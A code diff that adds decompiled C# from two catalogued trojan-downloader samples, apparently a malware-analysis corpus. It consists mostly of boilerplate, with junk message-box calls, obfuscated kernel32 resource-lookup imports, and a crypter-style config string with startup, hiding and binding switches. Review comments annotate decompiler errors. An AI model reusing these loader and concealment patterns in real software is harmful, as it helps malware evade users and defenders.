int num7 = (int) Interaction.MsgBox((object) "wJUrThsHjTyHyqzSsyVdxmKOpRHUtJiywpkbfHwOIFMwlOWVVzGHFbzSGiNpUXRZnLpDZsdzNOWNDMjRhSDLBQDtUXMtEYOBaenLRIBfwVWHLGvHDJErgqgLmyxFoEFWiztwFIIsFGlGmJwfJSAmzhTQcSOeuxnfmvjokwKjqWVIRMIilaOrwxuOvQHlSCMnNYwhu");
int num8 = (int) Interaction.MsgBox((object) "edLKRyPRLjNUUVpyUWqrKybxOkkhyhFBJIUpKUCEwmgkLmSfZHpgiKyPRQaLDpPWEEFLfiZvKBInIvaCidPjComQVGkoTZCgMqaINJXXLzLqQadTIiOAJAKaHDXtBlpDCHVqBgusyBOHsIkmpezXMje");
int num9 = (int) Interaction.MsgBox((object) "kMMoLhTmjgfloVRarNurGpVEIjztbcsNnBEpfMTNVWGNvpoQCkSFSyQCLhkwmpQDfkXYOKeVbSfKDTxGajVpeUnhfrxhJgTUGdaQiOjLwiIEitczEaNWLqVvMdtdOoiOMuVtINOlbgzWEGKulWAcjCuuBEhMVCrmtzQjJwDwMbMootdvPmsjSttftkVIzLdquFUNGEjuxiD");
goto label_7;
label_2:
num2 = -1;
switch (num1)
{
case 2:
goto label_1;
}
}
catch (Exception ex) when (ex is Exception & num1 != 0 & num2 == 0)
{
ProjectData.SetProjectError(ex);
goto label_2;
}
throw ProjectData.CreateProjectError(-2146828237);
label_7:
string str1;
string str2 = str1;
if (num2 == 0)
return str2;
ProjectData.ClearProjectError();
return str2;
}
public string lfVsFLnQnKMKfkiicCZksag(string flCOOwyHMmkfIfn)
{
int num1 = (int) Interaction.MsgBox((object) "taCzeBqxHQKLRuOqOJPUAtnkRUwLujdCVLqCYMXJFSQODJBmAYxtKQRINksvMKNMERCncFduJPxEpCGfWqxtfiiRpgVZPWOOHbOeXKuIqCdeOlnlFqvINH");
int num2 = (int) Interaction.MsgBox((object) "PuPqmapbKarfjNSCjYNtnrfrJuoasKKXdjFrVSeGdGzHFxWQROjJJgJJucWiCjcEjJCkoWFznQVcpQYbicTKoyJtgEDlxmUCJoXlyKuLYXwDGDjXcXodETcuU");
string str;
return str;
}
}
}
@@ -0,0 +1,120 @@
<?xml version="1.0" encoding="utf-8"?>
<root>
<!--
Microsoft ResX Schema
Version 2.0
The primary goals of this format is to allow a simple XML format
that is mostly human readable. The generation and parsing of the
various data types are done through the TypeConverter classes
associated with the data types.
Example:
... ado.net/XML headers & schema ...
<resheader name="resmimetype">text/microsoft-resx</resheader>
<resheader name="version">2.0</resheader>
<resheader name="reader">System.Resources.ResXResourceReader, System.Windows.Forms, ...</resheader>
<resheader name="writer">System.Resources.ResXResourceWriter, System.Windows.Forms, ...</resheader>
<data name="Name1"><value>this is my long string</value><comment>this is a comment</comment></data>
<data name="Color1" type="System.Drawing.Color, System.Drawing">Blue</data>
<data name="Bitmap1" mimetype="application/x-microsoft.net.object.binary.base64">
<value>[base64 mime encoded serialized .NET Framework object]</value>
</data>
<data name="Icon1" type="System.Drawing.Icon, System.Drawing" mimetype="application/x-microsoft.net.object.bytearray.base64">
<value>[base64 mime encoded string representing a byte array form of the .NET Framework object]</value>
<comment>This is a comment</comment>
</data>
There are any number of "resheader" rows that contain simple
name/value pairs.
Each data row contains a name, and value. The row also contains a
type or mimetype. Type corresponds to a .NET class that support
text/value conversion through the TypeConverter architecture.
Classes that don't support this are serialized and stored with the
mimetype set.
The mimetype is used for serialized objects, and tells the
ResXResourceReader how to depersist the object. This is currently not
extensible. For a given mimetype the value must be set accordingly:
Note - application/x-microsoft.net.object.binary.base64 is the format
that the ResXResourceWriter will generate, however the reader can
read any of the formats listed below.
mimetype: application/x-microsoft.net.object.binary.base64
value : The object must be serialized with
: System.Runtime.Serialization.Formatters.Binary.BinaryFormatter
: and then encoded with base64 encoding.
mimetype: application/x-microsoft.net.object.soap.base64
value : The object must be serialized with
: System.Runtime.Serialization.Formatters.Soap.SoapFormatter
: and then encoded with base64 encoding.
mimetype: application/x-microsoft.net.object.bytearray.base64
value : The object must be serialized into a byte array
: using a System.ComponentModel.TypeConverter
: and then encoded with base64 encoding.
-->
<xsd:schema id="root" xmlns="" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:msdata="urn:schemas-microsoft-com:xml-msdata">
<xsd:import namespace="http://www.w3.org/XML/1998/namespace" />
<xsd:element name="root" msdata:IsDataSet="true">
<xsd:complexType>
<xsd:choice maxOccurs="unbounded">
<xsd:element name="metadata">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" />
</xsd:sequence>
<xsd:attribute name="name" use="required" type="xsd:string" />
<xsd:attribute name="type" type="xsd:string" />
<xsd:attribute name="mimetype" type="xsd:string" />
<xsd:attribute ref="xml:space" />
</xsd:complexType>
</xsd:element>
<xsd:element name="assembly">
<xsd:complexType>
<xsd:attribute name="alias" type="xsd:string" />
<xsd:attribute name="name" type="xsd:string" />
</xsd:complexType>
</xsd:element>
<xsd:element name="data">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" msdata:Ordinal="1" />
<xsd:element name="comment" type="xsd:string" minOccurs="0" msdata:Ordinal="2" />
</xsd:sequence>
<xsd:attribute name="name" type="xsd:string" use="required" msdata:Ordinal="1" />
<xsd:attribute name="type" type="xsd:string" msdata:Ordinal="3" />
<xsd:attribute name="mimetype" type="xsd:string" msdata:Ordinal="4" />
<xsd:attribute ref="xml:space" />
</xsd:complexType>
</xsd:element>
<xsd:element name="resheader">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" msdata:Ordinal="1" />
</xsd:sequence>
<xsd:attribute name="name" type="xsd:string" use="required" />
</xsd:complexType>
</xsd:element>
</xsd:choice>
</xsd:complexType>
</xsd:element>
</xsd:schema>
<resheader name="resmimetype">
<value>text/microsoft-resx</value>
</resheader>
<resheader name="version">
<value>2.0</value>
</resheader>
<resheader name="reader">
<value>System.Resources.ResXResourceReader, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
</resheader>
<resheader name="writer">
<value>System.Resources.ResXResourceWriter, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
</resheader>
</root>
@@ -0,0 +1 @@
SzRDHgVSMebxUsy||zXLgWNblUUHtUqE||uGKYtuFOJmDVpJD||sYhhfkWPWBNNcgj||1||BoxpBqUOoodZnUf||STARTUP||VALUE||EXE||DISABLE_REG||DISABLE_TSK||DISABLE_CMD||ANTIS||HIDE||0||MSG_BOX||MSG_ICO||MSG_TITLE||MSG_MESS||BIND_TRUE||BIND_RES||BIND_PASS||BIND_NAME
@@ -0,0 +1,50 @@
// Decompiled with JetBrains decompiler
// Type: SOUCHEIE.My.MyApplication
// Assembly: SOUCHEIE, Version=3.7.2.8, Culture=neutral, PublicKeyToken=null
// MVID: 9463E62C-5BDE-47C8-BBBA-DFBD0AA5A3A3
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Downloader.Win32.Karagany.dd-2cc5473996e68437dada294106155dfa4c6904107200c7a154f2ef1428c29950.exe
using Microsoft.VisualBasic.ApplicationServices;
using System;
using System.CodeDom.Compiler;
using System.ComponentModel;
using System.Diagnostics;
using System.Runtime.CompilerServices;
using System.Windows.Forms;
namespace SOUCHEIE.My
{
[EditorBrowsable(EditorBrowsableState.Never)]
[GeneratedCode("MyTemplate", "8.0.0.0")]
internal class MyApplication : WindowsFormsApplicationBase
{
[DebuggerStepThrough]
public MyApplication()
: base(AuthenticationMode.Windows)
{
this.IsSingleInstance = false;
this.EnableVisualStyles = true;
this.SaveMySettingsOnExit = true;
this.ShutdownStyle = ShutdownMode.AfterMainFormCloses;
}
[STAThread]
[DebuggerHidden]
[EditorBrowsable(EditorBrowsableState.Advanced)]
[MethodImpl(MethodImplOptions.NoInlining | MethodImplOptions.NoOptimization)]
internal static void Main(string[] Args)
{
try
{
Application.SetCompatibleTextRenderingDefault(WindowsFormsApplicationBase.UseCompatibleTextRendering);
}
finally
{
}
MyProject.Application.Run(Args);
}
[DebuggerStepThrough]
protected override void OnCreateMainForm() => this.MainForm = (Form) MyProject.Forms.Form1;
}
}
@@ -0,0 +1,24 @@
// Decompiled with JetBrains decompiler
// Type: SOUCHEIE.My.MyComputer
// Assembly: SOUCHEIE, Version=3.7.2.8, Culture=neutral, PublicKeyToken=null
// MVID: 9463E62C-5BDE-47C8-BBBA-DFBD0AA5A3A3
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Downloader.Win32.Karagany.dd-2cc5473996e68437dada294106155dfa4c6904107200c7a154f2ef1428c29950.exe
using Microsoft.VisualBasic.Devices;
using System.CodeDom.Compiler;
using System.ComponentModel;
using System.Diagnostics;
namespace SOUCHEIE.My
{
[EditorBrowsable(EditorBrowsableState.Never)]
[GeneratedCode("MyTemplate", "8.0.0.0")]
internal class MyComputer : Computer
{
[DebuggerHidden]
[EditorBrowsable(EditorBrowsableState.Never)]
public MyComputer()
{
}
}
}
@@ -0,0 +1,207 @@
// Decompiled with JetBrains decompiler
// Type: SOUCHEIE.My.MyProject
// Assembly: SOUCHEIE, Version=3.7.2.8, Culture=neutral, PublicKeyToken=null
// MVID: 9463E62C-5BDE-47C8-BBBA-DFBD0AA5A3A3
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Downloader.Win32.Karagany.dd-2cc5473996e68437dada294106155dfa4c6904107200c7a154f2ef1428c29950.exe
using Microsoft.VisualBasic;
using Microsoft.VisualBasic.ApplicationServices;
using Microsoft.VisualBasic.CompilerServices;
using System;
using System.CodeDom.Compiler;
using System.Collections;
using System.ComponentModel;
using System.ComponentModel.Design;
using System.Diagnostics;
using System.Reflection;
using System.Runtime.CompilerServices;
using System.Runtime.InteropServices;
using System.Windows.Forms;
namespace SOUCHEIE.My
{
[HideModuleName]
[StandardModule]
[GeneratedCode("MyTemplate", "8.0.0.0")]
internal sealed class MyProject
{
private static readonly MyProject.ThreadSafeObjectProvider<MyComputer> m_ComputerObjectProvider = new MyProject.ThreadSafeObjectProvider<MyComputer>();
private static readonly MyProject.ThreadSafeObjectProvider<MyApplication> m_AppObjectProvider = new MyProject.ThreadSafeObjectProvider<MyApplication>();
private static readonly MyProject.ThreadSafeObjectProvider<User> m_UserObjectProvider = new MyProject.ThreadSafeObjectProvider<User>();
private static MyProject.ThreadSafeObjectProvider<MyProject.MyForms> m_MyFormsObjectProvider = new MyProject.ThreadSafeObjectProvider<MyProject.MyForms>();
private static readonly MyProject.ThreadSafeObjectProvider<MyProject.MyWebServices> m_MyWebServicesObjectProvider = new MyProject.ThreadSafeObjectProvider<MyProject.MyWebServices>();
[HelpKeyword("My.Computer")]
internal static MyComputer Computer
{
[DebuggerHidden] get => MyProject.m_ComputerObjectProvider.GetInstance;
}
[HelpKeyword("My.Application")]
internal static MyApplication Application
{
[DebuggerHidden] get => MyProject.m_AppObjectProvider.GetInstance;
}
[HelpKeyword("My.User")]
internal static User User
{
[DebuggerHidden] get => MyProject.m_UserObjectProvider.GetInstance;
}
[HelpKeyword("My.Forms")]
internal static MyProject.MyForms Forms
{
[DebuggerHidden] get => MyProject.m_MyFormsObjectProvider.GetInstance;
}
[HelpKeyword("My.WebServices")]
internal static MyProject.MyWebServices WebServices
{
[DebuggerHidden] get => MyProject.m_MyWebServicesObjectProvider.GetInstance;
}
[MyGroupCollection("System.Windows.Forms.Form", "Create__Instance__", "Dispose__Instance__", "My.MyProject.Forms")]
[EditorBrowsable(EditorBrowsableState.Never)]
internal sealed class MyForms
{
public Form1 m_Form1;
[ThreadStatic]
private static Hashtable m_FormBeingCreated;
[EditorBrowsable(EditorBrowsableState.Never)]
[DebuggerHidden]
public MyForms()
{
}
public Form1 Form1
{
get
{
this.m_Form1 = MyProject.MyForms.Create__Instance__<Form1>(this.m_Form1);
return this.m_Form1;
}
set
{
if (value == this.m_Form1)
return;
if (value != null)
throw new ArgumentException("Property can only be set to Nothing");
this.Dispose__Instance__<Form1>(ref this.m_Form1);
}
}
[DebuggerHidden]
private static T Create__Instance__<T>(T Instance) where T : Form, new()
{
if ((object) Instance != null && !Instance.IsDisposed)
return Instance;
if (MyProject.MyForms.m_FormBeingCreated != null)
{
if (MyProject.MyForms.m_FormBeingCreated.ContainsKey((object) typeof (T)))
throw new InvalidOperationException(Utils.GetResourceString("WinForms_RecursiveFormCreate"));
}
else
MyProject.MyForms.m_FormBeingCreated = new Hashtable();
MyProject.MyForms.m_FormBeingCreated.Add((object) typeof (T), (object) null);
try
{
return new T();
}
catch (TargetInvocationException ex) when (
{
// ISSUE: unable to correctly present filter
ProjectData.SetProjectError((Exception) ex);
if (ex.InnerException != null)
{
SuccessfulFiltering;
}
else
throw;
}
)
{
throw new InvalidOperationException(Utils.GetResourceString("WinForms_SeeInnerException", ex.InnerException.Message), ex.InnerException);
}
finally
{
MyProject.MyForms.m_FormBeingCreated.Remove((object) typeof (T));
}
}
[DebuggerHidden]
private void Dispose__Instance__<T>(ref T instance) where T : Form
{
instance.Dispose();
instance = default (T);
}
[EditorBrowsable(EditorBrowsableState.Never)]
public override bool Equals(object o) => base.Equals(RuntimeHelpers.GetObjectValue(o));
[EditorBrowsable(EditorBrowsableState.Never)]
public override int GetHashCode() => base.GetHashCode();
[EditorBrowsable(EditorBrowsableState.Never)]
internal new System.Type GetType() => typeof (MyProject.MyForms);
[EditorBrowsable(EditorBrowsableState.Never)]
public override string ToString() => base.ToString();
}
[MyGroupCollection("System.Web.Services.Protocols.SoapHttpClientProtocol", "Create__Instance__", "Dispose__Instance__", "")]
[EditorBrowsable(EditorBrowsableState.Never)]
internal sealed class MyWebServices
{
[DebuggerHidden]
[EditorBrowsable(EditorBrowsableState.Never)]
public MyWebServices()
{
}
[DebuggerHidden]
[EditorBrowsable(EditorBrowsableState.Never)]
public override bool Equals(object o) => base.Equals(RuntimeHelpers.GetObjectValue(o));
[EditorBrowsable(EditorBrowsableState.Never)]
[DebuggerHidden]
public override int GetHashCode() => base.GetHashCode();
[DebuggerHidden]
[EditorBrowsable(EditorBrowsableState.Never)]
internal new System.Type GetType() => typeof (MyProject.MyWebServices);
[DebuggerHidden]
[EditorBrowsable(EditorBrowsableState.Never)]
public override string ToString() => base.ToString();
[DebuggerHidden]
private static T Create__Instance__<T>(T instance) where T : new() => (object) instance == null ? new T() : instance;
[DebuggerHidden]
private void Dispose__Instance__<T>(ref T instance) => instance = default (T);
}
[EditorBrowsable(EditorBrowsableState.Never)]
[ComVisible(false)]
internal sealed class ThreadSafeObjectProvider<T> where T : new()
{
[EditorBrowsable(EditorBrowsableState.Never)]
[DebuggerHidden]
public ThreadSafeObjectProvider()
{
}
internal T GetInstance
{
[DebuggerHidden] get
{
if ((object) MyProject.ThreadSafeObjectProvider<T>.m_ThreadStaticValue == null)
MyProject.ThreadSafeObjectProvider<T>.m_ThreadStaticValue = new T();
return MyProject.ThreadSafeObjectProvider<T>.m_ThreadStaticValue;
}
}
}
}
}
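Review bot: The `catch` clause in `Create__Instance__<T>` is not valid C#, so this file cannot be recompiled as committed. It is the block the decompiler flags with `// ISSUE: unable to correctly present filter`: the `when (` is followed by a statement block, and `SuccessfulFiltering;` is not a statement. Judging by the handler body, which rethrows using `ex.InnerException`, the intended clause is probably `catch (TargetInvocationException ex) when (ex.InnerException != null)`, with `ProjectData.SetProjectError((Exception) ex);` moved to the first line of the handler. Separately, `ThreadSafeObjectProvider<T>.GetInstance` reads and writes `m_ThreadStaticValue`, which is not declared anywhere in this file; a comment such as `// decompiler dropped the compiler-generated [ThreadStatic] field here` would stop readers from looking for it elsewhere.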
@@ -0,0 +1,68 @@
// Decompiled with JetBrains decompiler
// Type: SOUCHEIE.My.MySettings
// Assembly: SOUCHEIE, Version=3.7.2.8, Culture=neutral, PublicKeyToken=null
// MVID: 9463E62C-5BDE-47C8-BBBA-DFBD0AA5A3A3
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Downloader.Win32.Karagany.dd-2cc5473996e68437dada294106155dfa4c6904107200c7a154f2ef1428c29950.exe
using Microsoft.VisualBasic.ApplicationServices;
using Microsoft.VisualBasic.CompilerServices;
using System;
using System.CodeDom.Compiler;
using System.ComponentModel;
using System.Configuration;
using System.Diagnostics;
using System.Runtime.CompilerServices;
using System.Threading;
namespace SOUCHEIE.My
{
[GeneratedCode("Microsoft.VisualStudio.Editors.SettingsDesigner.SettingsSingleFileGenerator", "10.0.0.0")]
[CompilerGenerated]
[EditorBrowsable(EditorBrowsableState.Advanced)]
internal sealed class MySettings : ApplicationSettingsBase
{
private static MySettings defaultInstance = (MySettings) SettingsBase.Synchronized((SettingsBase) new MySettings());
private static bool addedHandler;
private static object addedHandlerLockObject = RuntimeHelpers.GetObjectValue(new object());
[DebuggerNonUserCode]
[EditorBrowsable(EditorBrowsableState.Advanced)]
private static void AutoSaveSettings(object sender, EventArgs e)
{
if (!MyProject.Application.SaveMySettingsOnExit)
return;
MySettingsProperty.Settings.Save();
}
public static MySettings Default
{
get
{
if (!MySettings.addedHandler)
{
object handlerLockObject = MySettings.addedHandlerLockObject;
ObjectFlowControl.CheckForSyncLockOnValueType(handlerLockObject);
Monitor.Enter(handlerLockObject);
try
{
if (!MySettings.addedHandler)
{
MyProject.Application.Shutdown += (ShutdownEventHandler) ((sender, e) =>
{
if (!MyProject.Application.SaveMySettingsOnExit)
return;
MySettingsProperty.Settings.Save();
});
MySettings.addedHandler = true;
}
}
finally
{
Monitor.Exit(handlerLockObject);
}
}
return MySettings.defaultInstance;
}
}
}
}
@@ -0,0 +1,24 @@
// Decompiled with JetBrains decompiler
// Type: SOUCHEIE.My.MySettingsProperty
// Assembly: SOUCHEIE, Version=3.7.2.8, Culture=neutral, PublicKeyToken=null
// MVID: 9463E62C-5BDE-47C8-BBBA-DFBD0AA5A3A3
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Downloader.Win32.Karagany.dd-2cc5473996e68437dada294106155dfa4c6904107200c7a154f2ef1428c29950.exe
using Microsoft.VisualBasic;
using Microsoft.VisualBasic.CompilerServices;
using System.ComponentModel.Design;
using System.Diagnostics;
using System.Runtime.CompilerServices;
namespace SOUCHEIE.My
{
[DebuggerNonUserCode]
[HideModuleName]
[CompilerGenerated]
[StandardModule]
internal sealed class MySettingsProperty
{
[HelpKeyword("My.Settings")]
internal static MySettings Settings => MySettings.Default;
}
}
@@ -0,0 +1,46 @@
// Decompiled with JetBrains decompiler
// Type: SOUCHEIE.My.Resources.Resources
// Assembly: SOUCHEIE, Version=3.7.2.8, Culture=neutral, PublicKeyToken=null
// MVID: 9463E62C-5BDE-47C8-BBBA-DFBD0AA5A3A3
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Downloader.Win32.Karagany.dd-2cc5473996e68437dada294106155dfa4c6904107200c7a154f2ef1428c29950.exe
using Microsoft.VisualBasic;
using Microsoft.VisualBasic.CompilerServices;
using System.CodeDom.Compiler;
using System.ComponentModel;
using System.Diagnostics;
using System.Globalization;
using System.Resources;
using System.Runtime.CompilerServices;
namespace SOUCHEIE.My.Resources
{
[CompilerGenerated]
[StandardModule]
[GeneratedCode("System.Resources.Tools.StronglyTypedResourceBuilder", "4.0.0.0")]
[DebuggerNonUserCode]
[HideModuleName]
internal sealed class Resources
{
private static ResourceManager resourceMan;
private static CultureInfo resourceCulture;
[EditorBrowsable(EditorBrowsableState.Advanced)]
internal static ResourceManager ResourceManager
{
get
{
if (object.ReferenceEquals((object) SOUCHEIE.My.Resources.Resources.resourceMan, (object) null))
SOUCHEIE.My.Resources.Resources.resourceMan = new ResourceManager("SOUCHEIE.Resources", typeof (SOUCHEIE.My.Resources.Resources).Assembly);
return SOUCHEIE.My.Resources.Resources.resourceMan;
}
}
[EditorBrowsable(EditorBrowsableState.Advanced)]
internal static CultureInfo Culture
{
get => SOUCHEIE.My.Resources.Resources.resourceCulture;
set => SOUCHEIE.My.Resources.Resources.resourceCulture = value;
}
}
}
@@ -0,0 +1,120 @@
<?xml version="1.0" encoding="utf-8"?>
<root>
<!--
Microsoft ResX Schema
Version 2.0
The primary goals of this format is to allow a simple XML format
that is mostly human readable. The generation and parsing of the
various data types are done through the TypeConverter classes
associated with the data types.
Example:
... ado.net/XML headers & schema ...
<resheader name="resmimetype">text/microsoft-resx</resheader>
<resheader name="version">2.0</resheader>
<resheader name="reader">System.Resources.ResXResourceReader, System.Windows.Forms, ...</resheader>
<resheader name="writer">System.Resources.ResXResourceWriter, System.Windows.Forms, ...</resheader>
<data name="Name1"><value>this is my long string</value><comment>this is a comment</comment></data>
<data name="Color1" type="System.Drawing.Color, System.Drawing">Blue</data>
<data name="Bitmap1" mimetype="application/x-microsoft.net.object.binary.base64">
<value>[base64 mime encoded serialized .NET Framework object]</value>
</data>
<data name="Icon1" type="System.Drawing.Icon, System.Drawing" mimetype="application/x-microsoft.net.object.bytearray.base64">
<value>[base64 mime encoded string representing a byte array form of the .NET Framework object]</value>
<comment>This is a comment</comment>
</data>
There are any number of "resheader" rows that contain simple
name/value pairs.
Each data row contains a name, and value. The row also contains a
type or mimetype. Type corresponds to a .NET class that support
text/value conversion through the TypeConverter architecture.
Classes that don't support this are serialized and stored with the
mimetype set.
The mimetype is used for serialized objects, and tells the
ResXResourceReader how to depersist the object. This is currently not
extensible. For a given mimetype the value must be set accordingly:
Note - application/x-microsoft.net.object.binary.base64 is the format
that the ResXResourceWriter will generate, however the reader can
read any of the formats listed below.
mimetype: application/x-microsoft.net.object.binary.base64
value : The object must be serialized with
: System.Runtime.Serialization.Formatters.Binary.BinaryFormatter
: and then encoded with base64 encoding.
mimetype: application/x-microsoft.net.object.soap.base64
value : The object must be serialized with
: System.Runtime.Serialization.Formatters.Soap.SoapFormatter
: and then encoded with base64 encoding.
mimetype: application/x-microsoft.net.object.bytearray.base64
value : The object must be serialized into a byte array
: using a System.ComponentModel.TypeConverter
: and then encoded with base64 encoding.
-->
<xsd:schema id="root" xmlns="" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:msdata="urn:schemas-microsoft-com:xml-msdata">
<xsd:import namespace="http://www.w3.org/XML/1998/namespace" />
<xsd:element name="root" msdata:IsDataSet="true">
<xsd:complexType>
<xsd:choice maxOccurs="unbounded">
<xsd:element name="metadata">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" />
</xsd:sequence>
<xsd:attribute name="name" use="required" type="xsd:string" />
<xsd:attribute name="type" type="xsd:string" />
<xsd:attribute name="mimetype" type="xsd:string" />
<xsd:attribute ref="xml:space" />
</xsd:complexType>
</xsd:element>
<xsd:element name="assembly">
<xsd:complexType>
<xsd:attribute name="alias" type="xsd:string" />
<xsd:attribute name="name" type="xsd:string" />
</xsd:complexType>
</xsd:element>
<xsd:element name="data">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" msdata:Ordinal="1" />
<xsd:element name="comment" type="xsd:string" minOccurs="0" msdata:Ordinal="2" />
</xsd:sequence>
<xsd:attribute name="name" type="xsd:string" use="required" msdata:Ordinal="1" />
<xsd:attribute name="type" type="xsd:string" msdata:Ordinal="3" />
<xsd:attribute name="mimetype" type="xsd:string" msdata:Ordinal="4" />
<xsd:attribute ref="xml:space" />
</xsd:complexType>
</xsd:element>
<xsd:element name="resheader">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" msdata:Ordinal="1" />
</xsd:sequence>
<xsd:attribute name="name" type="xsd:string" use="required" />
</xsd:complexType>
</xsd:element>
</xsd:choice>
</xsd:complexType>
</xsd:element>
</xsd:schema>
<resheader name="resmimetype">
<value>text/microsoft-resx</value>
</resheader>
<resheader name="version">
<value>2.0</value>
</resheader>
<resheader name="reader">
<value>System.Resources.ResXResourceReader, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
</resheader>
<resheader name="writer">
<value>System.Resources.ResXResourceWriter, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
</resheader>
</root>
@@ -0,0 +1,16 @@
using System.Reflection;
using System.Runtime.InteropServices;
using System.Security.Permissions;
[assembly: AssemblyProduct("Product name")]
[assembly: Guid("694b4498-936e-469c-86fb-8d5608191d12")]
[assembly: ComVisible(false)]
[assembly: AssemblyTrademark("Trademark")]
[assembly: AssemblyCopyright("Copyright")]
[assembly: AssemblyFileVersion("1.0.0.0")]
[assembly: AssemblyCompany("Company name")]
[assembly: AssemblyConfiguration("")]
[assembly: AssemblyDescription("File Description")]
[assembly: AssemblyTitle("Title")]
[assembly: AssemblyVersion("1.0.0.0")]
[assembly: SecurityPermission(SecurityAction.RequestMinimum, SkipVerification = true)]
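Review bot: The last attribute, `[assembly: SecurityPermission(SecurityAction.RequestMinimum, SkipVerification = true)]`, is left uncommented although it is the only security-relevant line in this file. It asks the runtime to skip IL verification for the whole assembly, using a declarative request action that is obsolete from .NET Framework 4 onward. The other attributes are unfilled template values (`"Product name"`, `"Company name"`, `"Title"`, `"File Description"`), so this metadata carries no publisher information and should not be relied on for attribution. I would add `// Triage note: assembly-level SkipVerification request plus placeholder version-info strings; treat both as static indicators, not as publisher data.` above the attribute block.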
@@ -0,0 +1,29 @@
// Decompiled with JetBrains decompiler
// Type: Rjk3ibeceopw5x00uimwa5h2w.ch2futx3h3zpmhyzsblwlfrdktcnf3voh
// Assembly: hh2ifwz3, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 68766CC0-7547-4113-80E9-8D0602728CEB
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Downloader.Win32.VB.anrt-380e52e4d9ffde603129df7f732dbf8782a7e1ed33d5b4ff17391d0a97e97afe.exe
using System;
using System.Runtime.InteropServices;
namespace Rjk3ibeceopw5x00uimwa5h2w
{
public class ch2futx3h3zpmhyzsblwlfrdktcnf3voh
{
[DllImport("kernel32", EntryPoint = "GetModuleHandleA", CharSet = CharSet.Ansi, SetLastError = true)]
public static extern IntPtr Pnqgzzjk5f0hyikci(string lpModuleName);
[DllImport("kernel32.dll", EntryPoint = "FindResourceA")]
public static extern IntPtr Ffz3mpnfyg4clsrkfrhqubycp(
IntPtr hModule,
int lpID,
string lpType);
[DllImport("kernel32.dll", EntryPoint = "LoadResource", SetLastError = true)]
public static extern IntPtr yeyqpjvohzgayjchvjm2bzdvn(IntPtr hModule, IntPtr hResInfo);
[DllImport("kernel32.dll", EntryPoint = "SizeofResource", SetLastError = true)]
public static extern uint Ncmhhqqsfk5fqfa4eo2qymkyp(IntPtr hModule, IntPtr hResInfo);
}
}
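Review bot: The class has no comment saying what it wraps, and every method name is obfuscator output, so a reader must parse each `EntryPoint` to see that these are the kernel32 resource-lookup functions. I would add above the class `// P/Invoke wrappers, names obfuscated: GetModuleHandleA, FindResourceA, LoadResource, SizeofResource (kernel32).`, plus a one-line comment on each declaration giving the real API name. The callers are outside this hunk, so what is done with the located resource cannot be stated from here. `FindResourceA` is also the only one of the three `kernel32.dll` resource imports declared without `SetLastError = true`, which is worth noting for anyone instrumenting these calls.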
@@ -0,0 +1 @@
